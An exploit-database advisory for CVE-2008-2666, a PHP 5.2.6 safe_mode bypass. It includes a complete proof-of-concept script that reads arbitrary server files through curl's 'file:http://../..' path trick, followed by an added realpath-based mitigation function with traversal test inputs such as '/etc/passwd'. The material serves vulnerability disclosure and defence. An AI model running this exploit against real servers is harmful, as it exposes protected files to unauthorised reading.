PHP 5.2.6 safe_mode bypass PoC

Published: 2008.06.29
Credit: Maksymilian Arciemowicz
Risk: Medium
CWE: CWE-22
CVE: CVE-2008-2666
Local: Yes
Remote: No

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

<?php
/*
Exploit for CVE-2008-2666:
http://cxsecurity.com/research//55

Original URL
http://cxsecurity.com/achievement_exploitalert/10

safe_mode Bypass PHP 5.2.6
by Maksymilian Arciemowicz http://cxsecurity.com
cxib [at] cxsecurity [dot] com

How to fix?
Do not use safe_mode as a main safety
*/

// Prints a small HTML form so the file name can also be submitted via POST.
eCHo "<PRE><P>This is exploit from <a href=\"http://cxsecurity.com\">http://cxsecurity.com</a> Maksymilian Arciemowicz<p>Script for legal use only.<p>PHP 5.2.6 safe_mode bypass<p>More: <a href=\"http://cxsecurity.com/news/0/0x24\">http://cxsecurity.com/news/0/0x24</a><p><form name=\"form\" action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\" value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\" value=\"Show\"></form>\n";

// A directory literally named "http:" next to the script: the "../" sequences
// in the crafted path below traverse upward starting from this component, so
// the string looks like a URL to one check while resolving as a local path.
if(!IS_dir(dirname(__FILE__)."/http:")){ // can work without this requirement
if(!IS_writable(dirname(__FILE__))) die("<b>I can't create http: directory</b>");
mkDIR("http:");
}

// File name comes from register_globals ($file), GET or POST.
if(Empty($file) aNd Empty($_GET['file']) aNd Empty($_POST['file'])) diE("\n".$karatonik);

if(!empty($_GET['file'])) $file=$_GET['file'];
if(!empty($_POST['file'])) $file=$_POST['file'];


// curl's "file:" handler is given a path that begins with "http://" followed
// by many "../" segments; the file contents, if readable, are written to output.
if((curl_exec(curl_init("file:http://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file))) aNd !emptY($file)) die("<B><br>best regards cxib from cxsecurity.com</B></FONT>");
elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> doesn't exist or you don't have
permissions.</CENTER></FONT>");

?>
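An added example, not part of the original advisory, showing the application-side check that "Do not use safe_mode as a main safety" calls for: reject scheme prefixes such as the "file:http://" form used above, then resolve the name with realpath() and confirm it stays inside a fixed base directory. The function name safe_local_path(), the temporary demo directory and the sample inputs are assumptions constructed for this example.

```php
<?php
// Added example (not from the original advisory): confine a user-supplied file
// name to one base directory instead of relying on safe_mode. Names below
// (safe_local_path, the demo directory and inputs) are assumptions/constructed.

function safe_local_path(string $base, string $userInput): ?string
{
    // Reject anything with a scheme prefix ("file:", "http://", "php://", ...).
    // The PoC above depends on "http://..." being read as a URL by one check
    // and as a local path (a directory named "http:") by curl's file: handler.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $userInput) || strpos($userInput, "\0") !== false) {
        return null;   // scheme prefix, or an embedded NUL that truncates C-level paths
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // realpath() collapses ".." segments and symlinks and fails for missing files.
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $userInput);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment check on the *resolved* path: it must start with base + "/".
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo: a temporary base directory holding one permitted file and,
// as in the PoC, a subdirectory literally named "http:".
$base = sys_get_temp_dir() . '/safe_path_demo_' . getmypid();
mkdir($base . '/docs', 0700, true);
mkdir($base . '/http:', 0700);
file_put_contents($base . '/docs/readme.txt', "ok\n");

$inputs = [
    'docs/readme.txt',                            // allowed
    'docs/../docs/readme.txt',                    // allowed once normalised
    '../../../../../../../../etc/passwd',         // plain traversal out of base
    'file:http://../../../../../../etc/passwd',   // PoC-style scheme prefix
    'http:/../../../../../../etc/passwd',         // traversal via the "http:" dir
];
foreach ($inputs as $in) {
    $res = safe_local_path($base, $in);
    printf("%-45s => %s\n", $in, $res === null ? 'REJECTED' : 'allowed: ' . $res);
}
```

Only the first two inputs resolve inside the base directory; the remaining three are rejected either by the scheme check or by the containment check on the resolved path.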

References:

http://cxsecurity.com/issue/WLB-2008060054




Copyright 2017, cxsecurity.com